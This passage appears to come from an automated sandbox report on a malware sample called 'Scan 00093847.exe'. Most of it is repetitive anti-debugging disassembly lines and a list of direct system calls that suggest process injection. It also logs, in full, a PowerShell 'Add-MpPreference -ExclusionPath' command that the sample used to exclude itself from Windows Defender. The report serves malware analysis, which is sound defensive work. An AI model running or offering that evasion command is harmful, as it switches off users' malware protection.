            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114A352 mov eax, dword ptr fs:[00000030h]3_2_0114A352
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107D34C mov eax, dword ptr fs:[00000030h]3_2_0107D34C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107D34C mov eax, dword ptr fs:[00000030h]3_2_0107D34C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]3_2_0110035C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]3_2_0110035C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]3_2_0110035C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110035C mov ecx, dword ptr fs:[00000030h]3_2_0110035C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]3_2_0110035C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0110035C mov eax, dword ptr fs:[00000030h]3_2_0110035C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01155341 mov eax, dword ptr fs:[00000030h]3_2_01155341
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079353 mov eax, dword ptr fs:[00000030h]3_2_01079353
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079353 mov eax, dword ptr fs:[00000030h]3_2_01079353
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01102349 mov eax, dword ptr fs:[00000030h]3_2_01102349
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0112437C mov eax, dword ptr fs:[00000030h]3_2_0112437C
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113F367 mov eax, dword ptr fs:[00000030h]3_2_0113F367
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01087370 mov eax, dword ptr fs:[00000030h]3_2_01087370
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01087370 mov eax, dword ptr fs:[00000030h]3_2_01087370
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01087370 mov eax, dword ptr fs:[00000030h]3_2_01087370
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A438F mov eax, dword ptr fs:[00000030h]3_2_010A438F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A438F mov eax, dword ptr fs:[00000030h]3_2_010A438F
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0115539D mov eax, dword ptr fs:[00000030h]3_2_0115539D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107E388 mov eax, dword ptr fs:[00000030h]3_2_0107E388
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107E388 mov eax, dword ptr fs:[00000030h]3_2_0107E388
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107E388 mov eax, dword ptr fs:[00000030h]3_2_0107E388
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01078397 mov eax, dword ptr fs:[00000030h]3_2_01078397
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01078397 mov eax, dword ptr fs:[00000030h]3_2_01078397
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01078397 mov eax, dword ptr fs:[00000030h]3_2_01078397
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010D739A mov eax, dword ptr fs:[00000030h]3_2_010D739A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010D739A mov eax, dword ptr fs:[00000030h]3_2_010D739A
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B33A0 mov eax, dword ptr fs:[00000030h]3_2_010B33A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B33A0 mov eax, dword ptr fs:[00000030h]3_2_010B33A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A33A5 mov eax, dword ptr fs:[00000030h]3_2_010A33A5
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113B3D0 mov ecx, dword ptr fs:[00000030h]3_2_0113B3D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]3_2_0108A3C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]3_2_0108A3C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]3_2_0108A3C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]3_2_0108A3C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]3_2_0108A3C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A3C0 mov eax, dword ptr fs:[00000030h]3_2_0108A3C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010883C0 mov eax, dword ptr fs:[00000030h]3_2_010883C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010883C0 mov eax, dword ptr fs:[00000030h]3_2_010883C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010883C0 mov eax, dword ptr fs:[00000030h]3_2_010883C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010883C0 mov eax, dword ptr fs:[00000030h]3_2_010883C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113C3CD mov eax, dword ptr fs:[00000030h]3_2_0113C3CD
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010903E9 mov eax, dword ptr fs:[00000030h]3_2_010903E9
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011553FC mov eax, dword ptr fs:[00000030h]3_2_011553FC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B63FF mov eax, dword ptr fs:[00000030h]3_2_010B63FF
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113F3E6 mov eax, dword ptr fs:[00000030h]3_2_0113F3E6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109E3F0 mov eax, dword ptr fs:[00000030h]3_2_0109E3F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109E3F0 mov eax, dword ptr fs:[00000030h]3_2_0109E3F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0109E3F0 mov eax, dword ptr fs:[00000030h]3_2_0109E3F0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B7208 mov eax, dword ptr fs:[00000030h]3_2_010B7208
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B7208 mov eax, dword ptr fs:[00000030h]3_2_010B7208
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01155227 mov eax, dword ptr fs:[00000030h]3_2_01155227
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107823B mov eax, dword ptr fs:[00000030h]3_2_0107823B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113B256 mov eax, dword ptr fs:[00000030h]3_2_0113B256
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113B256 mov eax, dword ptr fs:[00000030h]3_2_0113B256
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B724D mov eax, dword ptr fs:[00000030h]3_2_010B724D
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079240 mov eax, dword ptr fs:[00000030h]3_2_01079240
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01079240 mov eax, dword ptr fs:[00000030h]3_2_01079240
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01086259 mov eax, dword ptr fs:[00000030h]3_2_01086259
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107A250 mov eax, dword ptr fs:[00000030h]3_2_0107A250
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]3_2_01130274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01084260 mov eax, dword ptr fs:[00000030h]3_2_01084260
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01084260 mov eax, dword ptr fs:[00000030h]3_2_01084260
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01084260 mov eax, dword ptr fs:[00000030h]3_2_01084260
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107826B mov eax, dword ptr fs:[00000030h]3_2_0107826B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C1270 mov eax, dword ptr fs:[00000030h]3_2_010C1270
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C1270 mov eax, dword ptr fs:[00000030h]3_2_010C1270
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010A9274 mov eax, dword ptr fs:[00000030h]3_2_010A9274
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114D26B mov eax, dword ptr fs:[00000030h]3_2_0114D26B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0114D26B mov eax, dword ptr fs:[00000030h]3_2_0114D26B
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE284 mov eax, dword ptr fs:[00000030h]3_2_010BE284
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010BE284 mov eax, dword ptr fs:[00000030h]3_2_010BE284
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01100283 mov eax, dword ptr fs:[00000030h]3_2_01100283
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01100283 mov eax, dword ptr fs:[00000030h]3_2_01100283
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01100283 mov eax, dword ptr fs:[00000030h]3_2_01100283
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B329E mov eax, dword ptr fs:[00000030h]3_2_010B329E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010B329E mov eax, dword ptr fs:[00000030h]3_2_010B329E
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_01155283 mov eax, dword ptr fs:[00000030h]3_2_01155283
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010902A0 mov eax, dword ptr fs:[00000030h]3_2_010902A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010902A0 mov eax, dword ptr fs:[00000030h]3_2_010902A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010952A0 mov eax, dword ptr fs:[00000030h]3_2_010952A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010952A0 mov eax, dword ptr fs:[00000030h]3_2_010952A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010952A0 mov eax, dword ptr fs:[00000030h]3_2_010952A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010952A0 mov eax, dword ptr fs:[00000030h]3_2_010952A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011092BC mov eax, dword ptr fs:[00000030h]3_2_011092BC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011092BC mov eax, dword ptr fs:[00000030h]3_2_011092BC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011092BC mov ecx, dword ptr fs:[00000030h]3_2_011092BC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011092BC mov ecx, dword ptr fs:[00000030h]3_2_011092BC
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011172A0 mov eax, dword ptr fs:[00000030h]3_2_011172A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011172A0 mov eax, dword ptr fs:[00000030h]3_2_011172A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]3_2_011162A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011162A0 mov ecx, dword ptr fs:[00000030h]3_2_011162A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]3_2_011162A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]3_2_011162A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]3_2_011162A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]3_2_011162A0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011492A6 mov eax, dword ptr fs:[00000030h]3_2_011492A6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011492A6 mov eax, dword ptr fs:[00000030h]3_2_011492A6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011492A6 mov eax, dword ptr fs:[00000030h]3_2_011492A6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011492A6 mov eax, dword ptr fs:[00000030h]3_2_011492A6
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AB2C0 mov eax, dword ptr fs:[00000030h]3_2_010AB2C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]3_2_0108A2C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]3_2_0108A2C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]3_2_0108A2C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]3_2_0108A2C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]3_2_0108A2C3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010892C5 mov eax, dword ptr fs:[00000030h]3_2_010892C5
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010892C5 mov eax, dword ptr fs:[00000030h]3_2_010892C5
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B2D3 mov eax, dword ptr fs:[00000030h]3_2_0107B2D3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B2D3 mov eax, dword ptr fs:[00000030h]3_2_0107B2D3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0107B2D3 mov eax, dword ptr fs:[00000030h]3_2_0107B2D3
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF2D0 mov eax, dword ptr fs:[00000030h]3_2_010AF2D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010AF2D0 mov eax, dword ptr fs:[00000030h]3_2_010AF2D0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010902E1 mov eax, dword ptr fs:[00000030h]3_2_010902E1
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010902E1 mov eax, dword ptr fs:[00000030h]3_2_010902E1
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010902E1 mov eax, dword ptr fs:[00000030h]3_2_010902E1
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0113F2F8 mov eax, dword ptr fs:[00000030h]3_2_0113F2F8
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_011552E2 mov eax, dword ptr fs:[00000030h]3_2_011552E2
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010792FF mov eax, dword ptr fs:[00000030h]3_2_010792FF
            Source: C:\Users\user\Desktop\Scan 00093847.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\Scan 00093847.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Scan 00093847.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe"
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtClose: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe NtResumeThread: Direct from: 0x76F036AC
